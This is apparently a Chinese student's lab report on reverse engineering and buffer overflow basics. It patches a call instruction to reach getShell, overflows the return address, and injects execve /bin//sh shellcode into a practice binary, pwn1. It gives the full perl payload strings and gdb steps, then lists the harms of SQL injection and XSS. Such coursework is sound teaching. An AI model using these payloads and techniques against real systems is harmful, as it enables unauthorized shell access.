标签:描述 汇编指令 目标 view iframe ram 汇编 bre ascii码
目录
运行sudo apt-get install libc6-dev-i386
保证后续32位程序运行不出错
用sudo su
切换至root用户。方便后续指令操作
1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
NOP汇编指令的机器码是“90” JNE汇编指令的机器码是“75” JE 汇编指令的机器码是“74” JMP汇编指令的机器码是“eb” CMP汇编指令的机器码是“39”
以上仅为此次实践可能用到机器码,具体见汇编指令与机器码对应表
通过修改main中call指令目标地址,将目标地址由原来的foo改为我们需要的getShell
对pwn1
可执行文件进行反汇编objdump -d pwn1 | more
,查看call指令位置、foo地址、getShell地址
可以找到main
中的call
指令,看到foo
跳转地址8048491<foo>
、getShell
地址804847d
同时可以看到call指令对应机器码e8 d7 ff ff ff
,其中e8
代表call
,后面四个十六进制数则代表foo
函数地址
由此可以计算出getShell函数地址为0xffffffd7+(0x804847d-0x8048491)=0xffffffc3
接下来就需要我们把call函数的返回地址的机器码由d7 ff ff ff
改为c3 ff ff ff
我们需要使用vi
编辑器,vi pwn1
后进入ASCII码页面,输入:%!xxd
,将文件转化为16进制
我们可以输入/d7
查找foo
函数对应位置
可以看到,我们搜索的第一个位置就出现了e8 d7 ff ff ff
即找到foo
位置
接下来,我们把d7
改为c3
就能实现getShell
的跳转
运行一下pwn1
这里发生了错误,这是因为没有将十六进制转换为ASCII码形式,需要输入%!xxd -r
,改后攻击成功
利用缓冲区溢出漏洞,将
foo
函数对应返回地址覆盖,变成我们想要的getShell
返回地址
这里需要用到gdb
,用apt-get install gdb
进行安装,开启gdb
,进行调试
根据老师提供的例子,先用1111111122222222333333334444444412345678
测试输入字符串哪几个字符会覆盖到返回地址
可以看到eip寄存器中存放的地址变为0x35353535
,34 33 32 31
是4 3 2 1
的ASCII码,所以可以确定覆盖的位置是输入字符串的29-32
位
构建输入字符串
getShell的内存地址,通过反汇编时可以看到,即0804847d。
对比之前结果,字符串为11111111222222223333333344444444\x7d\x84\x04\x08
由于我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。
\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
使用perl:
perl -e ‘print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"‘ > input
将字符串存入input中
将input输入到pwn1中,实现攻击:(cat input; cat) | ./pwn1
在确保注入条件具备时,将Shellcode注入到可执行文件中,实现攻击
apt-get install execstack
安装execstack
1.设置堆栈可执行(-为开启,X为关闭)
2.关闭地址随机化(2为开启,0为关闭)
构造Shellcode有两种模式,根据实际缓冲区大小以及Shellcode长度选取,这里选择
nops+shellcode+retaddr
,即Shellcode在返回地址之前
用perl构造输入字符串:(由于返回地址未确定就先用\x4\x3\x2\x1
表示)
perl -e ‘print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"‘ > input_shellcode
打开一个终端运行pwn1(先不要回车)
在另一个终端打开gdb(这里记得要切换root权限,否则attach会失败)
输入ps -ef | grep pwn1
查看进程号,我这里是2299
开启gdb:gdb
,调试进程:attach 2299
通过设置断点,来查看注入buf的内存地址
首先要得到函数的retaddr,则反汇编:disassemble foo
得到ret地址为0x080484ae
然后设置断点:break *0x080484ae
,输入c
开始运行
接下来到另一个终端回车,使程序往下执行至断点
此时查看esp寄存器地址:0xffffd2dc
输入x/16x 0xffffd2dc
,以十六进制查看0xffffd2dc
后续16字节内容
得到我们定义的Shellcode返回地址\x4\x3\x2\x1
位于0xffffd2dc
后四位,即得到Shellcode真实返回地址0xffffd2dc+0x00000004=0xffffd2e0
,退出gdb
然后用已知的返回地址替代原来的\x4\x3\x2\x1
构建字符串:
perl -e ‘print "A" x 32;print"\xe0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"‘ > input_shellcode
重新注入:(cat input_shellcode;cat) | ./pwn1
,实施攻击
1.在进行工具获取sudo apt-get install libc6-dev-i386
时,获取失败
一开始我ping www.baidu.com 告诉我域名解析失败,我就根据网上的解决方案把etc下面的配置改了,后来发现网络联不通,我就把原来的配置改回来了。etn0网卡也没了,根据新的方案重新联网,就可以安装了。
2.在gdb中切入进程时attach 进程号
总是错误
发现是因为我没有切入root权限导致的,用sudo su
就解决了
3.出现fatal error: sys/cdefs.h: 没有那个文件或目录
我一开始没有安装32位编译器,就失败了,后来在CSDN博客中找到指令
这次实践总体来说比较顺利,虽然其中大大小小的问题不胜枚举,但我还是通过不断解决问题,圆满的做出来了。跟着老师的视频走,实践的大致思路有了,但还有几个细节不是很理解,如在实践三中构建的Shellcode是如何构造出来的等。这次实践让我收获良多,我理解了三种基础攻击的原理:修改机器指令、实施缓冲区溢出攻击、进行Shellcode注入。通过实际的操作我也进一步感受到了网络攻防的基本步骤,对于网络攻防有了更深入的体会,也产生了更多的学习兴趣。
漏洞定义:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
漏洞危害数不胜数,以下我仅列举SQL注入的对网络造成的部分危害:
数据库信息泄漏:数据库中存储的用户隐私信息泄露。
网页篡改:通过操作数据库对特定网页进行篡改。
网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。
数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改。
服务器被远程控制,被安装后门:经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。
破坏硬盘数据,瘫痪全系统。
XSS跨站脚本漏洞的危害包括但不限于:
钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入,甚至发起基于DHTML更高级的钓鱼攻击方式。
网站挂马:跨站后利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。
身份盗用:Cookie是用户对于特定网站的身份验证标志,XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。如果一个网站管理员用户Cookie被窃取,将会对网站引发巨大的危害。
盗取网站用户信息:当能够窃取到用户Cookie从而获取到用户身份时,攻击者可以获取到用户对网站的操作权限,从而查看用户隐私信息。
垃圾信息发送:比如在SNS社区中,利用XSS漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群体。
劫持用户Web行为:一些高级的XSS攻击甚至可以劫持用户的Web行为,监视用户的浏览历史,发送与接收的数据等等。
XSS蠕虫:XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施DDoS攻击等。
除此之外还有很多危害,包括对破坏电脑硬件的病毒CIH,破坏网络可用性的拒绝服务攻击,随着时代的发展,攻击方式不断更新换代,漏洞类型也在不断增加,所谓网络攻防,盾也要和矛齐头并进,这样才能为越来越多的计算机使用者提供一个安全可靠的计算机使用环境。
2020-2 网络对抗技术 20175120 exp1 逆向及Bof基础实践
标签:描述 汇编指令 目标 view iframe ram 汇编 bre ascii码
原文地址:https://www.cnblogs.com/1751-pyc/p/12405896.html